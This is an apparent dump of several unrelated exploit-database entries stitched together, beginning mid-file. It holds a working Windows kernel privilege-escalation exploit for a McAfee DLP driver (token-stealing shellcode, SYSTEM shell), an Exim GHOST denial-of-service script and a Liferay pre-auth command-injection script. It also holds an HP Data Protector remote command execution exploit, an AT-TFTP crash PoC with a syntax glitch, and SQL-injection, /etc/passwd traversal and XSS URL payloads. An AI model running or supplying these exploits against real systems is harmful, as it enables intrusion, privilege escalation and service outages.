#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows Server 2003
#define W2K3_KPROCESS 0x38 // Offset to _KPROCESS from a _ETHREAD struct
#define W2K3_TOKEN 0xd8 // Offset to TOKEN from the _EPROCESS struct
#define W2K3_UPID 0x94 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W2K3_APLINKS 0x98 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8
};
BYTE token_steal_w2k3[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W2K3_KPROCESS, // mov eax, [eax+W2K3_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W2K3_TOKEN] Retrieves TOKEN
0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W2K3_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00, // sub eax, W2K3_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W2K3_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov [eax+W2K3_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf("McAfee Data Loss Prevention Endpoint (hdlpctrl.sys) Arbitrary Write EoP Exploit\n");
printf(" Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 3)
{
printf("[i] Running Windows Server 2003\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "devbkctrl");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
if (GetWindowsVersion() == 1)
{
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
if (GetWindowsVersion() == 3)
{
memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3));
}
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00224014, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}
# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]
# Date: [1/29/2015]
# Exploit Author: [1N3]
# Vendor Homepage: [www.exim.org]
# Version: [4.80 or less]
# Tested on: [debian-7-7-64b]
# CVE : [2015-0235]
#!/usr/bin/python
# Exim ESMTP DoS Exploit by 1N3 v20150128
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
# http://crowdshield.com
#
# USAGE: python ghost-smtp-dos.py <ip> <port>
#
# Escape character is '^]'.
# 220 debian-7-7-64b ESMTP Exim 4.80 ...
# HELO
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
# Connection closed by foreign host.
#
# user () debian-7-7-64b:~$ dmesg
# ...
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
# libc-2.13.so[7fabef2a2000+182000]
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print "usage: %s <host>" % (argv[0])
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
target = argv[1] # SET TARGET
port = argv[2] # SET PORT
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,int(port)))
data = s.recv(1024)
print "CONNECTION: " +data
s.send('HELO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.close()
main(sys.argv)
source: https://www.securityfocus.com/bid/47552/info
Nuke Evolution Xtreme is prone to a local file-include vulnerability and an SQL-injection vulnerability.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Nuke Evolution Xtreme 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
http://www.example.com/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00
#!/bin/sh
# Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE
# Date: 11/16/2014
# Exploit author: drone (@dronesec)
# Vendor homepage: http://www.liferay.com/
# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip
# Version: 7.0.0 M1, 7.0.0 M2, 7.0.0 M3
# Fixed in: 7.0.3
# Tested on: Windows 7
# Pre-auth command injection using an exposed Apache Felix,
# exposed by default on all Liferay Portal 7.0 installs.
#
# ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe"
#
(echo open $1 11311
sleep 1
echo system:getproperties
sleep 1
echo exec \"$2\"
sleep 1
) | telnet
source: https://www.securityfocus.com/bid/47542/info
Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dolibarr 3.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
import socket
import struct
import sys
def exploit(host, port, command):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
print "[+] Target connected."
OFFSET_DEC_START = 133
OFFSET_DEC = (OFFSET_DEC_START + len(command))
# print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
# print "len(command)" + str(len(command))
# print "OFFSET_DEC" + str(OFFSET_DEC)
OFFSET_HEX = "%x" % OFFSET_DEC
# print "OFFSET_HEX" + str(OFFSET_HEX)
OFFSET_USE = chr(OFFSET_DEC)
# print "Command Length: " + str(len(command))
PACKET_DATA = "\x00\x00\x00"+\
OFFSET_USE+\
"\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
"\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
"\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
"\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
"\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
"\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
"\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
"\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
" %s\x00" %command
# Send payload to target
print "[+] Sending PACKET_DATA"
sock.sendall(PACKET_DATA)
# Parse the response back
print "[*] Result:"
while True:
response = sock.recv(2048)
if not response: break
print response
except Exception as ex:
print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
exit(-3)
sock.close()
if __name__ == "__main__":
try:
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]
exploit(target, port, command)
except IndexError:
print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
exit(0)
source: https://www.securityfocus.com/bid/47561/info
AT-TFTP is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
AT-TFTP 1.8 is affected; other versions may also be vulnerable.
#!/usr/bin/python
##############################################################################
# Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
# http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################
import socket
import sys
host = '127.0.0.1'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
addr = (host,port)1
data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))